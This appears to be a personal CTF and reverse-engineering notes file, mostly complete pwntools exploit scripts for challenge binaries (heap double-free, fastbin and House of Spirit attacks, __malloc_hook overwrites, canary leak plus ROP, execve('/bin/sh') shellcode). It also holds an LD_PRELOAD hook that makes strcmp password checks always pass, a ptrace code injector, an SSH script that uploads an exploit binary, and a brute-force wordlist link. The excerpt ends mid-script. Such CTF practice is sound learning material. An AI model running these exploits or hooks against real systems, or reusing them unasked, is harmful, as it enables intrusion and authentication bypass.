Frida
from pwn import *
import frida
import sys
# pwntools tube configuration: verbose I/O logging and the terminal used by
# gdb.attach / interactive splits.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
# Filled in by PrintMessage() from the Frida agent's send() messages (hex
# strings); converted with int(..., 16) further down the script.
system_addr = ""
proc_addr = ""
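def PrintMessage(message, data):
    """Frida ``script.on('message')`` callback.

    ``send`` messages carry a payload of the form ``"<label>: <value>"``; when
    the label mentions ``system`` or ``pro_addr`` the trailing value (the hex
    address) is stored in the module globals ``system_addr`` / ``proc_addr``.
    ``error`` messages are dumped field by field; anything else is printed raw.

    Args:
        message: dict from Frida carrying at least a ``type`` key.
        data: binary payload accompanying the message (unused here).

    Returns:
        The value captured from a ``send`` payload, else ``None``.  The original
        callback returned nothing; the value only exists so the parsing can be
        checked by a caller.
    """
    global system_addr
    global proc_addr

    msg_type = message.get("type")
    if msg_type == "send":
        payload = message["payload"]
        # Take whatever follows the last space instead of a fixed 14-char
        # slice, so an address narrower than "0x" + 12 hex digits still parses.
        captured = payload.rpartition(" ")[2]
        if "system" in payload:
            system_addr = captured
        if "pro_addr" in payload:
            proc_addr = captured
        print("[*] var {0}".format(payload))
        return captured

    if msg_type == "error":
        for key in message:
            if key == "type":
                print("[*] %s" % "error:")
                continue
            # str and non-str fields print identically; the old
            # replace(' ', ' ') was a no-op.
            print("[*] %s:\n\t%s" % (key, message[key]))
        return None

    print(message)
    return None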
# Frida agent: report the target module's base and the address of libc's
# exported "system" symbol back to Python through send().
jscode = '''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
var exports = Module.enumerateExportsSync("/lib/x86_64-linux-gnu/libc.so.6");
for(var i=0;i<exports.length;i++){
if(exports[i].name == "system"){
send("name: "+exports[i].name+" address: "+exports[i].address);
}
}
'''
p_pwn = process("./re")
p = frida.attach("re")
script = p.create_script(jscode)
script.on('message',PrintMessage)
script.load()
# NOTE(review): the two globals are filled by PrintMessage when the agent's
# send() messages arrive; if none has arrived yet, int("", 16) raises ValueError.
system_addr = int(system_addr,16)
proc_addr = int(proc_addr,16)
print("system_addr: " + hex(system_addr))
print("proc_addr: " + hex(proc_addr))
# 24 bytes of filler followed by three 8-byte values derived from the leaked bases;
# the 0x753/0x774 offsets are presumably specific to this build of ./re.
pay = b"a"*24 + p64(proc_addr + 0x753) + p64(proc_addr +0x774) + p64(system_addr)
#sys.stdin.read()
p_pwn.sendline(pay)
p_pwn.interactive()
# Unused alternate agent snippet (hexdump of the module base). It is a bare
# string literal, so it has no effect when the script runs.
'''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
console.log(hexdump(pro_addr, {
offset: 743,
length: 750,
header: true,
ansi: true
}));
'''
LKM Makefile
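# Out-of-tree Linux kernel module build.
# Kernel version whose build tree is used (defaults to the running kernel).
KVERS = $(shell uname -r)
# Kernel modules name
obj-m += file_name.o
# Many file.c
#modulename-objs := file1.o file2.o
# Specify flags for the module compilation.
#EXTRA_CFLAGS=-g -O0

# $(MAKE) (not a bare "make") so flags such as -j and the jobserver propagate
# to the recursive kbuild invocation.
build: kernel_modules

kernel_modules:
	$(MAKE) -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

clean:
	$(MAKE) -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean

# None of these targets produce a file with their own name.
.PHONY: build kernel_modules clean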
Linux Hook
//main.c
#include <stdio.h>
#include <string.h>
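/*
 * Minimal password check used as the LD_PRELOAD target in hook.c below.
 * Compares argv[1] against the literal "test" with strcmp(); returns 0 either way.
 */
int main(int argc, char *argv[])
{
    /* Without an argument argv[1] is NULL and strcmp() would dereference it. */
    if (argc < 2)
    {
        printf("Usage: %s <password>\n", argv[0]);
        return 1;
    }
    if (strcmp(argv[1], "test"))
    {
        printf("Incorrect password\n");
    }
    else
    {
        printf("Correct password\n");
    }
    return 0;
}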
//hook.c
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
/*
hook的目標是strcmp,所以typedef了一個STRCMP函數指針
hook的目的是要控制函數行爲,從原庫libc.so.6中拿到strcmp指針,保存成old_strcmp以備調用
*/
typedef int(*STRCMP)(const char*, const char*);
int strcmp(const char *s1, const char *s2)
{
static void *handle = NULL;
static STRCMP old_strcmp = NULL;
if( !handle )
{
handle = dlopen("libc.so.6", RTLD_LAZY);
old_strcmp = (STRCMP)dlsym(handle, "strcmp");
}
printf("oops!!! hack function invoked. s1=<%s> s2=<%s>\n", s1, s2);
return 0;
}
# Build the target, then the interposing library (-shared/-fPIC; -ldl for dlopen/dlsym).
gcc -o test main.c
gcc -fPIC -shared -o hook.so hook.c -ldl
# Run with the hook preloaded: every strcmp() call resolves to hook.c first.
LD_PRELOAD=./hook.so ./test 123
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/reg.h> /* For constants ORIG_EAX etc */
#include <sys/user.h>
/* Marker routine that prints one fixed line; not referenced by main() below. */
void new_show()
{
    puts("Hooked by cc-sir!");
}
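/*
 * Attach to a running process with ptrace, overwrite the word at its current
 * rip with "int 0x80; int3", let it run into the breakpoint, then put the
 * original bytes and registers back and detach.  Usage: <prog> <pid>.
 * Needs ptrace permission over the target (same user, and with Yama
 * ptrace_scope=1 a descendant relationship or CAP_SYS_PTRACE).
 */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s pid\n", argv[0]);
        return 1;
    }

    struct user_regs_struct reg;
    pid_t pid = atoi(argv[1]);

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) {
        perror("PTRACE_ATTACH");
        return 1;
    }
    waitpid(pid, NULL, 0);                  /* wait for the attach-stop */

    /* the listing had "®" here: an HTML-escaped "&reg" — the address of reg */
    if (ptrace(PTRACE_GETREGS, pid, NULL, &reg) < 0) {
        perror("PTRACE_GETREGS");
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 1;
    }
    printf("rip: 0x%llx\n", reg.rip);      /* rip is unsigned long long */

    long addr = reg.rip;
    long code = 0xcc80cd;                  /* bytes cd 80 cc: int 0x80 ; int3 */
    long back_code;

    /* PEEKTEXT returns the word itself, so -1 is ambiguous: check errno. */
    errno = 0;
    back_code = ptrace(PTRACE_PEEKTEXT, pid, addr, NULL);   /* save original code */
    if (back_code == -1 && errno != 0) {
        perror("PTRACE_PEEKTEXT");
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 1;
    }
    printf("back_code: %lx\n", back_code); /* %lx, not %llx: back_code is a long */

    if (ptrace(PTRACE_POKETEXT, pid, addr, code) < 0) {     /* patch code */
        perror("PTRACE_POKETEXT");
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 1;
    }
    ptrace(PTRACE_CONT, pid, NULL, NULL);
    waitpid(pid, NULL, 0);                  /* target stops on the int3 */
    printf("The process has int 0x3!\n");
    getchar();

    if (ptrace(PTRACE_POKETEXT, pid, addr, back_code) < 0) { /* restore code */
        perror("PTRACE_POKETEXT");
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 1;
    }
    ptrace(PTRACE_SETREGS, pid, NULL, &reg);                /* restore registers */
    /* PTRACE_DETACH itself resumes the tracee and requires it to be stopped;
     * the original issued PTRACE_CONT first, after which DETACH fails (ESRCH). */
    printf("The process has continue run!\n");
    if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) {
        perror("PTRACE_DETACH");
        return 1;
    }
    return 0;
}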
linux對apk簽名
# Generate an RSA-2048 signing key (10000-day validity) in a keystore, then sign the APK with it.
keytool -genkey -v -alias KeyName -keyalg RSA -keysize 2048 -validity 10000 -keystore KeyFileName.keystore
# jarsigner produces a v1 (JAR) signature only; current Android tooling uses apksigner for the v2+ schemes.
jarsigner -verbose -keystore KeyFileName.keystore apk_file.apk KeyName
Linux 編譯libc.so
libc: sir.c:
/* Return the sum of a and b; the one symbol exported by libsir.so. */
int add(int a, int b)
{
    int sum = a;
    sum += b;
    return sum;
}
編譯:
gcc -fPIC -shared -o libsir.so sir.c
調用:
sir.h
#ifndef __SIR_H__
#define __SIR_H__
/* Declaration of add() from libsir.so (built from sir.c above). */
int add(int n1, int n2);
#endif
test.c:
#include<stdio.h>
#include"sir.h"
/* Call add() from libsir.so and print the result. */
int main(){
    printf("%d\n", add(6, 4));
    return 0;
}
編譯
gcc test.c -o test -L ./ -lsir
運行:
LD_LIBRARY_PATH=./ ./test
字符串畫圖片
from PIL import Image, ImageDraw, ImageFont
# Glyph cell size in pixels; also the grid step used when drawing below.
font_size = 12
text = "xxxx!"
# NOTE(review): absolute paths specific to the author's machine.
img_path = "/home/cc-sir/desktop/xx.jpg"
img_raw = Image.open(img_path)
# Pixel access object: img_array[x, y] yields the source colour at that point.
img_array = img_raw.load()
img_new = Image.new("RGB", img_raw.size, (0, 0, 0))
draw = ImageDraw.Draw(img_new)
font = ImageFont.truetype('/home/cc-sir/desktop/msyh.ttc', font_size)
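def character_generator(text):
    """Yield the characters of *text* in order, forever, cycling back to the start.

    Args:
        text: non-empty string to cycle through.

    Raises:
        ValueError: if *text* is empty. The original looped forever without
            yielding in that case, so the first next() call hung.
    """
    if not text:
        raise ValueError("character_generator needs a non-empty text")
    while True:
        for ch in text:
            yield ch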
# Walk the image on a font_size grid; each cell receives the next character,
# coloured with the source pixel at the cell's origin.
ch_gen = character_generator(text)
width, height = img_raw.size
for row in range(0, height, font_size):
    for col in range(0, width, font_size):
        colour = img_array[col, row]
        draw.text((col, row), next(ch_gen), font=font, fill=colour, direction=None)
img_new.convert('RGB').save("/home/cc-sir/desktop/hh.jpeg")
攻防世界
Noleak
部分地址覆蓋爆破:
# -*- coding: utf-8 -*-
from pwn import *
#context(os='linux',arch='amd64')
# pwntools setup for the local binary; the remote()/libc lines are kept commented out.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./timu"
p = process(name)
#p = remote("111.198.29.45",31616)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
#libc=ELF('./libc.so.6')
# Running the script with a trailing "G" argument attaches gdb first.
if args.G:
    gdb.attach(p)
def add(s,data):
    """Menu choice 1: answer the Size prompt with ``s`` and the Data prompt with ``data``."""
    p.recvuntil("Your choice :")
    p.sendline("1")
    p.recvuntil("Size: ")
    p.sendline(s)
    p.recvuntil("Data: ")
    p.send(data)
def delete(i):
    """Menu choice 2: send index ``i`` (already a string) to the Index prompt."""
    p.recvuntil("Your choice :")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline(i)
def update(i,s,data):
    """Menu choice 3: index ``i``, size ``s`` (both strings), then raw ``data`` via send()."""
    p.recvuntil("Your choice :")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline(i)
    p.recvuntil("Size: ")
    p.sendline(s)
    p.recvuntil("Data: ")
    p.send(data)
# NOTE(review): the sizes, indices and raw bytes below are presumably specific
# to the binary and libc this note was written against. The script mixes str
# and bytes arguments (Python 2 semantics assumed).
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
add("180",b"1"*16*6 + p64(0) + p64(0x41)) #0
add("100","2"*8) #1
add("100","3"*8) #2
add("100","4"*8) #3
add("100","5"*8) #4
#delete("0")
delete("2")
delete("3")
update("3","100",p64(0x600ff5))
add("100","6"*8) #5
add("100","7"*59 + "\x00") #6
update("0","100",p64(0) + b"\x71")
update("6","100","7"*59 + "\x10")
delete("0")
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\xc1")
update("6","100","7"*59 + "\x10")
delete("0")
# malloc_hook = 0x9aed
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\x71")
update("6","100",shellcode + "7"*(59-len(shellcode)) + "\x10")
# Only the low 16 bits are written (p16): the section title calls this a
# partial-overwrite brute force, so the run is expected to need repeating.
update("0","100",p16(0x6aed))
add("100","sir")
add("100",b"8"*19 + p64(0x600ff5+0x10))
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline("1")
p.interactive()
supermarket
漏洞在於realloc, 當重新分配的new_size < pre_size, 返回原指針; new_size > pre_size釋放原指針, 重新分配內存.
可以用堆覆蓋,大堆編輯其中的小堆:
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup: 64-bit target, local process, libc taken from ./libc.so.6.
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./supermarket"
p = process(name)
#p = remote("111.198.29.45",38460)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
libc=ELF('./libc.so.6')
if args.G:
    gdb.attach(p)
# The bug is in realloc: when the new size is smaller than the old one the original
# pointer is returned; when it is larger the original pointer is freed and memory
# is allocated anew.
def add(name,size,description):
    """Menu choice 1: create an item with ``name``, a fixed price of 100, ``size`` and ``description``."""
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("price:")
    p.sendline("100")
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(description)
def change(name,size,description):
    """Menu choice 5: re-size the description of item ``name`` to ``size`` and set it to ``description``."""
    p.recvuntil("your choice>> ")
    p.sendline("5")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(description)
def show():
    """Menu choice 3: ask the program to list its items; the caller parses the output."""
    p.recvuntil("your choice>> ")
    p.sendline("3")
# 0x08048864
# NOTE(review): sizes and the 0x804b048 constant are presumably specific to this
# 32-bit binary; the leak below reads 4 bytes (u32) after a fixed marker.
add('aaaa',0x20,"1111")
add('bbbb',0x80,"2222")
add('cccc',0x20,"3333")
change("bbbb",0xb0,"q")
add("dddd",0x50,'4444')
pay = b"dddd\x00" + b'q'*11 + p32(0x64) + p32(0x50) + p32(0x804b048)
change("bbbb",0x80,pay)
show()
p.recvuntil("dddd: price.100, des.")
atoi_addr = u32(p.recv(4))
# libc base from the leaked symbol, then system resolved from the same libc.
libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_addr + libc.symbols['system']
success("atoi_addr: " + hex(atoi_addr))
pay1 = p32(system_addr)
change("dddd",0x50,pay1)
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
note-service2
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup: 64-bit target (asm() below assembles for amd64), local process.
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
#p = remote("111.198.29.45",54704)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc=ELF('./pwn')
if args.G:
    gdb.attach(p)
def add(i,data):
    """Menu choice 1: index ``i``, a fixed size of 8, then ``data`` via send() (no newline)."""
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("index:")
    p.sendline(str(i))
    p.recvuntil("size:")
    p.sendline('8')
    p.recvuntil("content:")
    p.send(data)
def delete(i):
    """Menu choice 4: delete the entry at index ``i``."""
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("index:")
    p.sendline(str(i))
# Each 8-byte entry holds a short instruction plus an "\xeb\x19" jump (jmp +0x19)
# to the next entry; the size is fixed at 8 by add().
add(0,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(1,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(2,asm('mov eax,0x3b') + b'\xeb\x19')
add(3,asm('xor rsi,rsi') + b'\x90\x90\xeb\x19')
add(4,asm('xor rdx,rdx') + b'\x90\x90\xeb\x19')
add(5,asm('syscall') + b'\x90'*5)
delete(0)
# NOTE(review): a negative index is sent here; the program presumably does not
# bounds-check it.
add(-8,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
Python base64替換密碼錶
import base64
import string
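x = "5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs="
# Custom alphabet: position i here stands for position i of the standard one.
base_now = ['v', 'w', 'x', 'r', 's', 't', 'u', 'o', 'p', 'q', '3', '4', '5', '6', '7', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'y', 'z', '0', '1', '2', 'P', 'Q', 'R', 'S', 'T', 'K', 'L', 'M', 'N', 'O', 'Z', 'a', 'b', 'c', 'd', 'U', 'V', 'W', 'X', 'Y', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', '8', '9', '+', '/']
base_now_str = ''.join(base_now)
print(len(base_now_str))
base_original_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
print(len(base_original_str))


def remap_alphabet(data, custom, standard):
    """Map each character of *data* from the *custom* alphabet onto *standard*.

    Characters absent from *custom* (e.g. the ``=`` padding) pass through
    unchanged.  Works on Python 2 and 3, unlike ``string.maketrans`` which
    only exists on Python 2.

    Raises:
        ValueError: if the two alphabets differ in length.
    """
    if len(custom) != len(standard):
        raise ValueError("alphabets must have the same length")
    table = dict(zip(custom, standard))
    return ''.join(table.get(ch, ch) for ch in data)


flag = base64.b64decode(remap_alphabet(x, base_now_str, base_original_str))
print(flag)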
babystack
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup; payloads are Python 2 str (u64('\x00' + p.recv(7)) mixes
# literals with received data).
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./babystack/libc-2.27.so')
if args.G:
    gdb.attach(p)
p.recvuntil("What's your name: ")
# 133 + 4 bytes of filler; the 7 bytes echoed after the "bbbb" marker are read back.
pay = "a" * 133 + 'b'*4
p.send(pay)
p.recvuntil("bbbb")
cannary = u64('\x00' + p.recv(7))
core_starr = u64(p.recv(6) + '\x00\x00') - 0x910
success("canary: " + hex(cannary))
success("core_starr: " + hex(core_starr))
# NOTE(review): 0x910/0x973/0x80a/0x441270/0x5829d9/0x460480 are presumably
# offsets for this specific binary and libc-2.27 build; the libc lookups kept
# in the trailing comments would avoid hard-coding them.
pop_rdi = core_starr + 0x973 #pop rdi; ret;
pay = 'a'*136 + p64(cannary) + p64(core_starr + 0x80a)
p.recvuntil("What do you want to say: ")
p.sendline(pay)
p.recvuntil("What's your name: ")
pay = "a" * (136+8) + 'b'*8
p.send(pay)
p.recvuntil("b" * 8)
lib_starr = u64(p.recv(6) + '\x00\x00') - 0x441270 #libc.symbols['__libc_start_main'] #0x441270
success("lib_starr: " + hex(lib_starr))
p.recvuntil("What do you want to say: ")
bin_sh = lib_starr + 0x5829d9 #libc.search['/bin/sh']#
system_addr = lib_starr + 0x460480 #libc.symbols['system']#0x460480
pay = 'c'*136 + p64(cannary) + "qqqqqqqq" + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.send(pay)
p.interactive()
'''
libc2.23:
system_offset = 0x45390 # 0x3f480
bin_sh_offset = 0x18cd57 # 0x1619d9
free_offset = 0x3e3e90
malloc_offset = 0x3e3e40
malloc_hook_offset = 0x3c4b10
free_hook_offset = 0x3c67a8
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
CTF-wiki
2017 0ctf bheap
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup for the local ./bheap binary; args.G attaches gdb first.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './bheap'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)
if args.G:
    gdb.attach(p)
def alloc(s):
    """Command 1: allocate with size ``s``."""
    p.recvuntil("Command: ")
    p.sendline("1")
    p.recvuntil("Size: ")
    p.sendline(str(s))
def fill(i,s,data):
    """Command 2: write ``s`` bytes of ``data`` into entry ``i`` (sendline appends a newline)."""
    p.recvuntil("Command: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline(str(i))
    p.recvuntil("Size: ")
    p.sendline(str(s))
    p.recvuntil("Content: ")
    p.sendline(data)
def free(i):
    """Command 3: free entry ``i``."""
    p.recvuntil("Command: ")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline(str(i))
def dump(i):
    """Command 4: print entry ``i``; the caller reads the "Content: " reply."""
    p.recvuntil("Command: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline(str(i))
# NOTE(review): chunk sizes and the 0x58 / 0x33 / 0x399b00 / 0x3f35a constants
# are presumably specific to the libc this note was written against; payloads
# are Python 2 str.
alloc(10) # 0
alloc(10) # 1
alloc(10) # 2
alloc(10) # 3
alloc(10) # 4
alloc(0x80) # 5
free(1)
free(3)
payload = 'a'*24 + p64(0x21) + p8(0xa0)
fill(2,len(payload),payload)
payload = 'a'*24 + p64(0x21)
fill(4,len(payload),payload)
alloc(10) # 1
alloc(10) # 3 5
payload = 'a'*24 + p64(0x91)
fill(4,len(payload),payload)
alloc(0x80) # 6
free(5)
dump(3)
p.recvuntil("Content: \n")
# 6 leaked bytes zero-extended to 8; offset_bin_main_arena(0) elsewhere in
# these notes evaluates to the same 0x58 on 64-bit.
main_arena = u64(p.recv(6) + '\x00\x00') - 0x58
success("main_arena: " + hex(main_arena))
alloc(0x60) # 5
free(5)
payload = p64(main_arena-0x33)
fill(3,len(payload),payload)
alloc(0x60) # 5
alloc(0x60) # 6
one_gadget = main_arena - 0x399b00 + 0x3f35a
payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget)
fill(7,len(payload),payload)
alloc(0x20)
p.interactive()
2015 9447 CTF : Search Engine
Double_Free:
# -*- coding: utf-8 -*-
from pwn import *
# pwntools setup for the local ./search binary; args.G attaches gdb first.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './search'
p = process(name)
if args.G:
    gdb.attach(p)
def search(s):
    """Menu choice 1: search for word ``s`` (its length is sent as the word size)."""
    p.recvuntil("3: Quit\n")
    p.sendline("1")
    p.recvuntil("Enter the word size:\n")
    p.sendline(str(len(s)))
    p.recvuntil("Enter the word:\n")
    p.sendline(s)
def delete(s):
    """Answer the "Delete this sentence (y/n)?" prompt with ``s``."""
    p.recvuntil("Delete this sentence (y/n)?\n")
    p.sendline(s)
def index(s):
    """Menu choice 2: index sentence ``s`` (its length is sent as the sentence size)."""
    p.recvuntil("3: Quit\n")
    p.sendline("2")
    p.recvuntil("Enter the sentence size:\n")
    p.sendline(str(len(s)))
    p.recvuntil("Enter the sentence:\n")
    p.sendline(s)
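def offset_bin_main_arena(idx, word_size=None):
    """Return the byte offset of bin ``idx`` from the start of main_arena.

    Layout followed (per the field comments): 4-byte lock, 4-byte flags, 10
    fastbin pointers, top and last_remainder, then pairs of pointers per bin;
    the final ``2 * word_bytes`` subtraction accounts for bin entries
    overlapping the preceding pair.

    Args:
        idx: bin index; 0 is used by the caller for the unsorted bin.
        word_size: pointer width in bits. Defaults to pwntools'
            ``context.word_size`` as the original did.

    Returns:
        int offset in bytes. Integer division is used so the result is an int
        under Python 3 as well (``/`` produced a float there).
    """
    if word_size is None:
        word_size = context.word_size
    word_bytes = word_size // 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # fastbin pointers
    offset += word_bytes * 2  # top, last_remainder
    offset += idx * 2 * word_bytes  # bin idx
    offset -= word_bytes * 2  # bin overlap
    return offset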
# Computed but not used below; the hard-coded 0x58 further down is the same value.
unsortedbin_offset_main_arena = offset_bin_main_arena(0)
index("a"*0x85 + " s")
search("s")
delete('y')
search("\x00")
p.recvuntil("Found 135: ")
lib_addr = u64(p.recv(6) + '\x00\x00')
# NOTE(review): 0x399b58 / 0x3f306 / 0x33 are presumably specific to the libc
# this note was written against.
one_gadget_addr = lib_addr - 0x399b58 + 0x3f306
main_arena_addr = lib_addr - 0x58
delete('n')
index('a'*0x5d + ' d')
index('b'*0x5d + ' d')
index('c'*0x5d + ' d')
search("d")
delete("y")
delete("y")
delete("y")
search("\x00")
delete("y")
delete("n")
delete("n")
fake_chunk_addr = main_arena_addr - 0x33
fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')
index(fake_chunk)
index('a' * 0x60) # allocate chunk_a
index('b' * 0x60) # allocate chunk_b
payload = '|/bin/sh;'
payload += (0x13-len(payload))*'a' + p64(one_gadget_addr)
payload = payload.ljust(0x60, 'f')
index(payload) # malloc_hook becomes one_gadget
success("lib_addr: " + hex(lib_addr))
p.interactive()
2014 hack.lu oreo
House Of Spirit:
from pwn import *
# pwntools setup for the local ./oreo binary (32-bit: p32/u32 are used below).
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './oreo'
p = process(name)
if args.G:
    gdb.attach(p)
def add(name,descrip):
    """Action 1: send ``name`` then ``descrip``. The prompt reads are commented out,
    so the three lines are sent back to back without waiting for the menu."""
    #p.recvuntil("Action: ")
    p.sendline('1')
    #p.recvuntil('Rifle name: ')
    p.sendline(name)
    #p.recvuntil('Rifle description: ')
    #sleep(0.5)
    p.sendline(descrip)
def show():
    """Action 2: list entries, then skip to the separator line."""
    #p.recvuntil("Action: ")
    p.sendline('2')
    p.recvuntil('===================================\n')
def order():
    """Action 3."""
    #p.recvuntil("Action: ")
    p.sendline('3')
def message(notice):
    """Action 4: submit ``notice`` as the order message."""
    #p.recvuntil("Action: ")
    p.sendline('4')
    #p.recvuntil("Enter any notice you'd like to submit with your order: ")
    p.sendline(notice)
# NOTE(review): 0x804a248 / 0x804a2a8 / 0x804a250 and the 0x24d40 delta are
# presumably specific to this binary and its libc; payloads are Python 2 str.
name = 'a'*27 + p32(0x804a248)
descrip = 'a'*25
add(name,descrip)
show()
p.recvuntil("===================================\nName: \nDescription: ")
put_addr = u32(p.recv(4))
system_addr = put_addr - 0x24d40
success("put_addr: " + hex(put_addr))
success("system_addr: " + hex(system_addr))
# 0x3e further entries before the final one.
for i in range(1,0x3f):
    name = 'a'*27 + p32(0)
    descrip = 'a'*25
    add(name,descrip)
name = 'a'*27 + p32(0x804a2a8)
descrip = 'a'*25
add(name,descrip)
payload = 0x20 * '\x00' + p32(0x40) + p32(0x90)
message(payload)
order()
add('a'*4,p32(0x804a250))
notice = p32(system_addr) + '||/bin/sh\x00'
message(notice)
p.interactive()
常用URL
字典:
https://github.com/rootphantomer/Blasting_dictionary
upload
#!/usr/bin/python
from pwn import *
# SSH target used when the script gets any command-line argument (see __main__).
# NOTE(review): placeholder-looking values; the password is stored in clear text
# in the script.
HOST = "12.12.12.12"
PORT = 1234
USER = "pwn"
PW = "sir"
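def compile():
    """Build poc.c into a static binary named poc (warnings suppressed).

    The command is passed as an argument list so no shell parses it, and the
    exit status is checked so a failed build is not silently uploaded later.

    Raises:
        subprocess.CalledProcessError: if gcc exits non-zero.
    """
    import subprocess
    log.info("Compile")
    subprocess.check_call(["gcc", "-w", "-static", "poc.c", "-o", "poc"])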
def exec_cmd(cmd):
    """Send ``cmd`` on the module-level tube ``r`` and wait for the next "$ " prompt."""
    r.sendline(cmd)
    r.recvuntil("$ ")
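def upload():
    """Send the local ``poc`` binary to the remote shell in 300-byte base64 chunks.

    Each chunk is appended to ``benc`` on the remote side with echo; the file is
    then decoded into ``exp`` and made executable.  Uses the module-level tube
    ``r`` (set up in ``__main__``) through exec_cmd().
    """
    p = log.progress("Upload")
    with open("poc", "rb") as f:
        data = f.read()
    # Decode to str: under Python 3 b64encode() returns bytes and "%s" would
    # embed the b'...' repr in the command line.
    encoded = base64.b64encode(data).decode("ascii")
    total = len(encoded)
    r.recvuntil("$ ")
    for i in range(0, total, 300):
        p.status("%d / %d" % (i, total))
        exec_cmd("echo \"%s\" >> benc" % (encoded[i:i + 300]))
    exec_cmd("cat benc | base64 -d > exp")
    exec_cmd("chmod +x exp")
    p.success()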
def exploit(r):
    """Build, upload, then hand the tube to the user. The ``r`` parameter shadows
    the module-level tube that compile()/upload() actually use."""
    compile()
    upload()
    r.interactive()
    return
# With any argument: open an SSH session and run /bin/sh there; otherwise run the
# local ./start.sh, print its pid and pause so a debugger can be attached.
if __name__ == "__main__":
    if len(sys.argv) > 1:
        session = ssh(USER, HOST, PORT, PW)
        r = session.run("/bin/sh")
        exploit(r)
    else:
        r = process("./start.sh")
        print util.proc.pidof(r)
        pause()
        exploit(r)
vmlinux
#!/bin/sh
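# Print $1 to stdout and exit 0 if it is an ELF file; otherwise return 1 so the
# caller can try the next decompressor.  "$1" is quoted so paths with spaces work.
check_vmlinux()
{
	# Use readelf to check if it's a valid ELF
	# TODO: find a better to way to check that it's really vmlinux
	# and not just an elf
	readelf -h "$1" > /dev/null 2>&1 || return 1
	cat "$1"
	exit 0
}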
# $1: magic bytes of a compression format, $2: a replacement string that cannot
# appear in $1, $3: the decompressor command.  Every offset where the magic
# occurs in $img is tried; on success check_vmlinux exits the script.
try_decompress()
{
	# The obscure use of the "tr" filter is to work around older versions of
	# "grep" that report the byte offset of the line instead of the pattern.
	# Try to find the header ($1) and decompress from here
	for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
	do
		pos=${pos%%:*}
